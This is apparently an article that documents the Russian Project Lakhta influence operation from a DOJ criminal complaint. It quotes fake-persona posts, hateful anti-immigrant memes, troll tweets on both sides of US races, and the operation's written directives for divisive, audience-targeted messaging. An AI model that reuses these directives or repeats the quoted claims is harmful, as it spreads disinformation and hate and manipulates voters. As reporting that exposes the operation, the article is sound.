Events in the United States were seized upon "to anchor their themes" including the Charleston church shootings, the Las Vegas concert shootings, the Charlottesville "Unite the Right" rally, police shootings of African-American men, and the personnel and policy decisions of the Trump administration.

Many of the graphics that were shared will be immediately recognizable to most social media users.

"Rachell Edison" Facebook profile
The graphic above was shared by a confirmed member of the conspiracy on December 5, 2016. "Rachell Edison" was a Facebook profile controlled by someone on the payroll of Project Lakhta.  Their comment read: "Whatever happens, blacks are innocent. Whatever happens, it's all guns and cops. Whatever happens, it's all racists and homophobes. Mainstream Media..."

The Rachell Edison account was created in September 2016 and controlled the Facebook page "Defend the 2nd".  Between December 2016 and May 2017, "while concealing its true identity, location, and purpose" this account was used to share over 700 inflammatory posts related to gun control and the Second Amendment.

Other accounts specialized on other themes.  Another account, using the name "Bertha Malone", was created in June 2015, using fake information to claim that the account holder lived in New York City and attended a university in NYC.   In January 2016, the account created a Facebook page called "Stop All Invaders" (StopAI) which shared over 400 hateful anti-immigration and anti-Islam memes, implying that all immigrants were either terrorists or criminals.  Posts shared by this acount reached 1.3 million individuals and at least 130,851 people directly engaged with the content (for example, by liking, sharing, or commenting on materials that originated from this account.)

Some examples of the hateful posts shared by "Bertha Malone" that were included in the DOJ criminal complaint,  included these:

The latter image was accompanied by the comment:

"Instead this stupid witch hunt on Trump, media should investigate this traitor and his plane to Islamize our country. If you are true enemy of America, take a good look at Barack Hussein Obama and Muslim government officials appointed by him."

Directions to Project Lakhta Team Members

The directions shared with the propaganda spreaders gave very specific examples of how to influence American thought, with guidance on which sources and techniques should be used to influence particular portions of our society.  For example, to drive wedges further into the Republican party, Republicans who spoke out against Trump were attacked on social media (all of these are marked in the Criminal Complaint as "preliminary translations of Russian text"):

"Brand McCain as an old geezer who has lost it and who long ago belonged in a home for the elderly. Emphasize that John McCain's pathological hatred towards Donald Trump and towards all his initiatives crosses all reasonable borders and limits.  State that dishonorable scoundrels, such as McCain, immediately aim to destroy all the conservative voters' hopes as soon as Trump tries to fulfill his election promises and tries to protect the American interests."

"Brand Paul Ryan a complete and absolute nobody incapable of any decisiveness.  Emphasize that while serving as Speaker, this two-faced loudmouth has not accomplished anything good for America or for American citizens.  State that the only way to get rid of Ryan from Congress, provided he wins in the 2018 primaries, is to vote in favor of Randy Brice, an American veteran and an iron worker and a Democrat."

Frequently the guidance was tied to a particular news headline, and directions on how to use the headline to spread their message of division were shared. A couple of examples:

After a news story "Trump: No Welfare To Migrants for Grants for First 5 Years" was shared, the conspiracy was directed to twist the messaging like this:

"Fully support Donald Trump and express the hope that this time around Congress will be forced to act as the president says it should. Emphasize that if Congress continues to act like the Colonial British government did before the War of Independence, this will call for another revolution.  Summarize that Trump once again proved that he stands for protecting the interests of the United States of America."

In response to an article about scandals in the Robert Mueller investigation, the direction was to use this messaging:

"Special prosecutor Mueller is a puppet of the establishment. List scandals that took place when Mueller headed the FBI.  Direct attention to the listed examples. State the following: It is a fact that the Special Prosector who leads the investigation against Trump represents the establishment: a politician with proven connections to the U.S. Democratic Party who says things that should either remove him from his position or disband the entire investigation commission. Summarize with a statement that Mueller is a very dependent and highly politicized figure; therefore, there will be no honest and open results from his investigation. Emphasize that the work of this commission is damaging to the country and is aimed to declare impeachement of Trump. Emphasize that it cannot be allowed, no matter what."

Many more examples are given, some targeted at particular concepts, such as this direction regarding "Sanctuary Cities":

"Characterize the position of the Californian sanctuary cities along with the position of the entire California administration as absolutely and completely treacherous and disgusting. Stress that protecting an illegal rapist who raped an American child is the peak of wickedness and hypocrisy. Summarize in a statement that "sanctuary city" politicians should surrender their American citizenship, for they behave as true enemies of the United States of America"

Some more basic guidance shared by Project Lakhta was about how to target conservatives vs. liberals, such as "if you write posts in a liberal group, you must not use Breitbart titles.  On the contrary, if you write posts in a conservative group, do not use Washington Post or BuzzFeed's titles."

We see the "headline theft" implied by this in some of their memes.  For example, this Breitbart headline:

Became this Project Lakhta meme (shared by Stop All Immigrants):

Similarly, this meme, originally shared as a quote from the Heritage Foundation, was adopted and rebranded by the Lakhta-funded "Stop All Immigrants":

Twitter Messaging and Specific Political Races

Many Twitter accounts shown to be controlled by paid members of the conspiracy made very specific posts in support of, or in opposition to, particular candidates for Congress or the Senate. Some examples listed in the Criminal Complaint include:

@CovfefeNationUS posting:

Tell us who you want to defeat!  Donate $1.00 to defeat @daveloebsack Donate $2.00 to defeat @SenatorBaldwin Donate $3.00 to defeat @clairecmc Donate $4.00 to defeat @NancyPelosi Donate $5.00 to defeat @RepMaxineWaters Donate $6.00 to defeat @SenWarren

Several of the Project Lakhta Twitter accounts got involved in the Alabama Senate race, but, underscoring that the objective of Lakhta is to CREATE DISSENT AND DISTRUST, they actually tweeted on opposite sides of the campaign:

One Project Lakhta Twitter account, @KaniJJackson, posted on December 12, 2017: 

"Dear Alabama, You have a choice today. Doug Jones put the KKK in prison for murdering 4 young black girls.  Roy Moore wants to sleep with your teenage daughters. This isn't hard. #AlabamaSenate"

while on the same day @JohnCopper16, also a confirmed Project Lakhta Twitter account, tweeted:

"People living in Alabama have different values than people living in NYC. They will vote for someone who represents them, for someone who they can trust. Not you.  Dear Alabama, vote for Roy Moore."

@KaniJJackson was a very active voice for Lakhta. Here are some additional tweets from that account:

"If Trump fires Robert Mueller, we have to take to the streets in protest.  Our democracy is at stake." (December 16, 2017)

"Who ended DACA? Who put off funding CHIP for 4 months? Who rejected a deal to restore DACA? It's not #SchumerShutdown. It's #GOPShutdown." (January 19, 2018)

@JohnCopper16 also tweeted on that topic: 
"Anyone who believes that President Trump is responsible for #shutdown2018 is either an outright liar or horribly ignorant. #SchumerShutdown for illegals. #DemocratShutdown #DemocratLosers #DemocratsDefundMilitary #AlternativeFacts"   (January 20, 2018)

@KaniJJackson on Parkland, Florida and the 2018 Midterm election: 
"Reminder: the same GOP that is offering thoughts and prayers today are the same ones that voted to allow loosening gun laws for the mentally ill last February.  If you're outraged today, VOTE THEM OUT IN 2018. #guncontrol #Parkland"

They even tweeted about themselves, as shown in this pair of tweets:

@JemiSHaaaZzz (February 16, 2018):
"Dear @realDonaldTrump: The DOJ indicted 13 Russian nationals at the Internet Research Agency for violating federal criminal law to help your campaign and hurt other campaigns. Still think this Russia thing is a hoax and a witch hunt? Because a lot of witches just got indicted."

@JohnCopper16 (February 16, 2018): 
"Russians indicted today: 13  Illegal immigrants crossing Mexican border indicted today: 0  Anyway, I hope all those Internet Research Agency f*ckers will be sent to gitmo." 

The Russians are also involved in "getting out the vote", especially among those who hold strongly divisive views:

@JohnCopper16 (February 27, 2018):
"Dem2018 platform - We want women raped by the jihadists - We want children killed - We want higher gas prices - We want more illegal aliens - We want more Mexican drugs And they are wondering why @realDonaldTrump became the President"

@KaniJJackson (February 19, 2018): 
"Midterms are 261 days, use this time to: - Promote your candidate on social media - Volunteer for a campaign - Donate to a campaign - Register to vote - Help others register to vote - Spread the word We have only 261 days to guarantee survival of democracy. Get to work! 

More recent tweets have covered a wide variety of topics, with other accounts expressing strong views around racial tensions and then speaking to the Midterm elections:

@wokeluisa (another confirmed Project Lakhta account): 
"Just a reminder that: - Majority black Flint, Michigan still has drinking water that will give you brain damage if consumed - Republicans are still trying to keep black people from voting - A terrorist has been targeting black families for assassination in Austin, Texas" 

and then, also @wokeluisa: (March 19, 2018): 
"Make sure to pre-register to vote if you are 16 y.o. or older. Don't just sit back, do something about everything that's going on because November 6, 2018 is the date that 33 senate seats, 436 seats in the House of Representatives and 36 governorships will be up for re-election." 

And from @johncopper16 (March 22, 2018):
"Just a friendly reminder to get involved in the 2018 Midterms. They are motivated They hate you They hate your morals They hate your 1A and 2A rights They hate the Police They hate the Military They hate YOUR President" 

Some of the many additional Twitter accounts controlled by the conspiracy mentioned in the Criminal Complaint: 

@UsaUsafortrump, @USAForDTrump, @TrumpWithUSA, @TrumpMov, @POTUSADJT, @imdeplorable201, @swampdrainer659, @maga2017trump, @TXCowboysRawk, @covfefeNationUS, @wokeluisa (2,000 tweets and at least 55,000 followers), @JohnCopper16, @Amconvoice, @TheTrainGuy13, @KaniJJackson, @JemiSHaaaZzz